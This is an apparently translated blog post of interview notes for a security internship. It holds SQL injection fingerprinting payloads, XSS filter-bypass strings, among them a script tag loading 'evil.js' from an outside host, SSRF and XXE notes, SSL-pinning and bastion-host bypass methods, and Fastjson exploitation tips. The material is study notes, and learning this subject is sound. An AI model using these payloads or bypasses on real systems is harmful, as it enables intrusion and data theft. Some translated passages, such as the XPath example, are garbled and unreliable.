[Interview] Remember an Anheng interview and summary

Yesterday's interview, I forgot to record it, and hereby sort out my relatively weak knowledge points while I still have some memories. Many answers are more colloquial, and I didn't have time to memorize the interview questions emm, eat a little to gain wisdom...

SQL injection

SQL injection type:

Boolean-based blind SQL injection (Boolean injection)
Error-based SQL injection (error-reporting injection)
UNION query SQL injection (joint query injection possible)
Stacked queries SQL injection (multi-statement query injection possible)
Time-based blind SQL injection (based on time delay injection)

The principle of sql injection?

The root cause of sql injection is that the code does not verify and process the user input items and directly splices them into the query statement. Using the sql injection vulnerability, an attacker can insert their own SQL code into the query statement of the application and pass it to the background SQL server to parse and execute it.

How to determine the database type of the other party through SQL injection?

This is really not answered, the following is the answer collected on the Internet
1. Database-specific connector judgment

id=1 and ‘1’+’1’=’11’ #MySQL或者是MSSQL
id=1 and concat(‘1’,’1’)=’11’ #MySQL或者Oracle
id=1 and ‘1’||’1’=’11’ #Oracle

MySQL and Oracle use the concat function for string concatenation, while MSSQL and Oracle use the '+' operator for string concatenation. Use these statements to determine the type of database that is running.

2. Judgment of unique data table

id=1 and (select count(*) from sys.user_tables)>0 and 1=1 #Oracle
id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1 #MySQL5.0以上
id=1 and (select count(*) from sysobjects)>0 and 1=1 #MSSQL
id=1 and (select count(*) from msysobjects)>0 and 1=1 #access数据库

Different databases contain specific tables or objects and return true value in any case. Oracle uses sys.user_tables, MySQL uses information_schema.TABLES, MSSQL uses sysobjects, and Access uses msysobjects, which are the names of metadata tables or objects. By injecting such a statement and observing its response, an attacker can learn what type of database system the target website uses.
3. Specific function to judge
len and length
len(): The function that SQL Server, MySQL and db2 return the length.
length(): Oracle and INFORMIX return length function.

version and @@version
version(): MySQL query version information function
@@version: MySQL and SQL Server query version information function

Both substring and substr MySQL functions can be used.
Oracle can only call substr
SQL Server can only call substring
4. Special symbols for judgment
/* is the comment character of MySQL database
– it is a comment character supported by Oracle and SQL Server
; it is a clause query Identifier, Oracle does not support multi-line query, if an error is returned, it may be an Oracle database
# is a comment in MySQL, if an error is returned, it may not be MySQL, and it also supports -- and /**/

5. Judging MYSQL based on blind special function

BENCHMARK(1000000,ENCODE('QWE','ASD'))
SLEEP(5)

PostgreSQL

PG_SLEEP(5)
GENERATE_SERIES(1,1000000)

SQL Server

WAITFOR DELAY '0:0:5'

6. Judging by the content of the error message
Add single quotation marks directly after the injection point, and judge the database according to the error message of the server.
The error prompts Microsoft JET Database Engine error '80040e14', indicating that the database is connected through the JET engine, indicating that the database is an ACCESS database, and if it is ODBC, it indicates that it is an MSSQL database.

Add other methods to determine the database type

1. Determine the database type according to the development language

asp：SQL Server，Access
.net：SQL Server
php：MySQL，PostgreSQL
java：Oracle，MySQL

2. Port judgment
Relational database:
The default port number of the Oracle database is 1521;
the default port number of the MySQL database is 3306; the
default port number of the SQLServer database is 1433;
the default port number of the postgreSQL database is 5432;

NOSQL database:
The default port number of MongoDB is: 27017;
the default port number of Redis is: 6379;
the default port number of memcached is: 11211;

Time Blind Function

I seem to have said a sleep() emmm
1. Principle
Since SQL statements are spliced ​​on the server side, and there is the same echo of correctness and error, that is, the error information is filtered, and the data can be judged bit by bit through the page response time. Since the functions in the time blind injection are executed in the database, too many executions of the sleep function or the benchmark function will cause the server load to be too high.
2. There is also a benchmark function

XPath injection

1. Principle
XPath injection is a type of web application attack similar to SQL injection. Attackers can take advantage of the power of the XPath language to send malicious payloads to web applications to obtain unauthorized information or perform unauthorized operations.
Attackers can inject malicious XPath expressions in form fields, URL parameters, and HTTP headers. These expressions can be interpreted as querying nodes or attributes in the XML document. If the web application does not properly sanitize the input data, an attacker can embed the XPath injection payload into the query and retrieve sensitive data from the XML
document
. ()= ' ' or '1' or '1' and password/text()=''],
this string will logically make the query always return true and will always allow the attacker to access the system. An attacker can use XPath to dynamically manipulate XML documents in an application. After the attack completes the login, the highest authority account and other important document information can be obtained through the XPath blind entry technology. By extension, there are many tricks for xpath injection, such as xpath error injection through the updataxml() function, and xpath blind injection.

What should I do if the http/https package cannot be caught?

What else can I do, I usually just give up this kind of small program or app with protection! , the purpose of the question should be to let me tell the bypass method

Wouldn't it be as simple as exporting the ssl certificate? I forgot to mention this
The following is the relevant packet capture method found

app does not have its own ssl certificate

Some apps do not apply for their own ssl certificates due to limited funds, but directly use the same ssl certificate as the browser. We can bypass this by installing Burp's ssl certificate directly on the Android emulator.

app has its own ssl certificate - certificate binding (SSL pinning)

SSL Pinning is a security mechanism used to ensure that the SSL connection established by a mobile app to a specific server is always secure. It does this by comparing the server's public key fingerprint to a predefined one. In SSL Pinning, the application stores a pre-defined server certificate or public key fingerprint, and forces the server to provide a matching certificate or public key fingerprint when establishing an SSL connection to ensure communication security. This can effectively prevent security threats based on man-in-the-middle attacks.

Certificate binding is also called one-way authentication. The app does not use the public SSL certificate. It spends money to find a certificate authority to buy a certificate of its own and set a communication key (password) by itself.

Burp captures the packets of the application layer and does not capture the packets of other layers. Since Burp has not installed the ssl certificate specific to this app, the data captured by Burp is garbled and cannot be recognized as HTTP requests. Burp will default it to other Layer data packets, do not capture this packet, resulting in failure to capture packets

Bypass method:
1. Find out the certificate in the app, and use that certificate for the communication between the app and the packet capture software.
2. Delete the one-way authentication code in the App, so that he can use the system certificate, and then he can communicate with the packet capture software.
Pulling the certificate needs to be reversed, which is difficult. The second method can be hooked with tools, which is similar to breakpoint processing.
Operate when the certificate and ypn have been installed

There are two ways to use the tool hook
1. JustTrustMe in the Xposed framework
JustTrustMe will automatically hook all places in the app that have one-way authentication during testing.
2. Objection bypasses one-way authentication

What are the logical loopholes?

authentication vulnerability

Brute force cracking vulnerability
can be used to calculate the number of errors for the user name. If it is higher than a certain threshold, the account will be locked for a period of time, or a verification code can be added,
but it cannot be locked permanently. It may be used to maliciously lock the account.
Session fixed attack
Cookie spoofing
vulnerability introduction: By forging cookies Information can be faked for other users to log in.
Vulnerability principle: The developer stores the identity information/login information in plaintext or simply encoded and hashed in cookies for convenience, and the website authorizes or authenticates the identity through the obtained cookies
. When modifying the lsLogin value to 1 in the hash field, it can be determined that the user has logged in
Vulnerability fix: Cookies should not store understandable identity information and login information, cookies can only store identity information and login information by storing random characters of sufficient length string to avoid tampering

Permission Logic Vulnerabilities

Horizontal permissions span
vertical permissions span
unauthorized access

Vulnerability in graphic verification code Vulnerability
in retrieval password logic Vulnerability in
business data tampering Vulnerability
in execution sequence logic

Other Types of Logic Vulnerabilities

Race Condition Vulnerability
Packet Replay Vulnerability

XSS bypass method

Regular insertion and its bypass

Script tags
bypass a removal operation:

<scr<script>ipt>alert("XSS")</scr<script>ipt>

The Script tag can be used to define an inline script or to load script from elsewhere:
JavaScript Events
We can define JavaScript events in elements like this:

<div οnclick="alert('xss')">

Most of the events have been removed by the filter, but there are still a small number of events that have not been filtered.

<divοnmοuseenter="alert('xss')">当用户鼠标移动到 div 上时就会触发我们的代码。

Another workaround is to insert a space between the attribute and the =:

<div onclick ="alert('xss')">

Inlinestyle
utilizes character encoding

%c1;alert(/xss/);//

Bypass length restrictions

"οnclick=alert(1)//
"><!--
--><script>alert(xss);<script>

Filter space
strategy: /**/, comment symbol bypass; / symbol bypass;

例：<img/src/onerror=alert(1)>

Rule Detection and Bypass

WAF rule detection
Use harmless payloads, similar to , observe the response to determine whether the application is HTML-encoded, whether tags are filtered, whether <> is filtered, etc.; if filtering closed tags, try payloads without closing tags (<b, <i,<marquee) observe the response; try the following payload

<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm      (1);</script>
<scriptsrc="http://rhainfosec.com/evil.js">

mixed case characters

What are the SSRF protocols?

http://: detect the survival of intranet hosts and open ports
gopher://: send GET or POST requests; attack intranet applications, such as FastCGI, Redis
dict://: leak information about installed software versions, check ports, and operate internal Net redis access, etc.
file://: read local files

Does XXE understand?

Principle: Parse the xml passed in by the user
Function: Intranet port scanning, reading files using the file protocol, etc., attacking intranet web applications using get (struts2, etc.)

危害：
1.导致可以加载恶意外部文件
2.造成文件读取
3.内网端口扫描
4.攻击内网网站
5.发起dos攻击等危害

Defense: Filter XML data submitted by users. If the program you are currently using is PHP, you can set
libxml_disable_entity_loader to TRUE to disable external entities for defensive purposes

Bastion machine penetration (bypass) in domain penetration

Regarding the bastion machine, I have reproduced a JumpServer RCE before
https://blog.csdn.net/weixin_53009585/article/details/129001750
Bastion machine: operation and maintenance audit system

Bypass ACL policy

There is no ACL on the firewall or switch in the server area, and when the ACL policy is not fine-grained enough, the PC in the user area can directly bypass the bastion host and directly access the remote server.

Bypass through the bastion machine jump

Another scenario is to first access the A server through the bastion host, and then access the B server on the A server, thus bypassing the bastion host and indirectly accessing the B server

Other bypass scenarios

1. The remote port of the target server is restricted by ACL, but other ports are not restricted, so the easiest solution is to bypass it through port forwarding. 2. Even if the server can access the external network, you can directly
use sunflower, todesk, Teamviewer to remotely , so that the audit of the bastion host is completely bypassed.
Remote tools such as Sunflower Teamviewer need to be blocked on the server network segment. This method will not be described in detail.

Fastjson

Didn't learn much here

fastjson deserialization vulnerability

A normal request is a get request and has no request body. You can check whether there is a fastjson string in the return packet by constructing a wrong post request. The principle of exploiting the vulnerability: sending a malicious json format
payload
in the request packet, the vulnerability When processing json objects, the @type field is not filtered, so that malicious TemplatesImpl classes can be passed in. Second, this class has a field that is _bytecodes, and some functions will generate java instances based on _byteencodes, which achieves fastjson Pass in a class through the field, and then execute the constructor when the class is generated.
What should I do if there is no echo?
1. One is to directly write the command execution results into static resource files, such as html, js, etc., and then you can directly see the results through http access
2. Take data out through dnslog, but if dns cannot be executed, it cannot Verified
3. Directly echo the command execution result to the HTTP response requesting POC

Do you know about Spring vulnerabilities?

I still don't know much here, so it's embarrassing to ask.
CVE-2010-1622 Spring Framework class.classLoader Class Remote Code Execution
CVE-2013-4152 XML External Entity (XXE) Injection in Spring Framework
CVE-2014-3527 Spring Security Authentication Bypass Vulnerability
CVE-2014-3578 Spring Framework Directory Traversal Vulnerability
CVE-2016-6652 Spring Data JPA SQL blind injection
CVE-2018-1271 Spring MVC directory traversal vulnerability
CVE-2020-5405 Spring Cloud Config path traversal caused information leakage
...
So much I will answer a sensitive information disclosure

Gold Notes vs. Silver Notes

This is just learned, I will learn ing today

domain fronting

I haven't learned yet emmm

Summarize

The overall interview revolves around the content of the resume to ask questions. Because of the internship position, the difficulty of asking is relatively shallow, but the scope is still quite wide. It is quite good to test your current learning status through the interview

reference:

https://www.cnblogs.com/Fluorescence-tjy/p/10400588.html
https://www.freebuf.com/articles/endpoint/359208.html
https://cloud.tencent.com/developer/article/1906218
https://blog.csdn.net/m0_38103658/article/details/105481323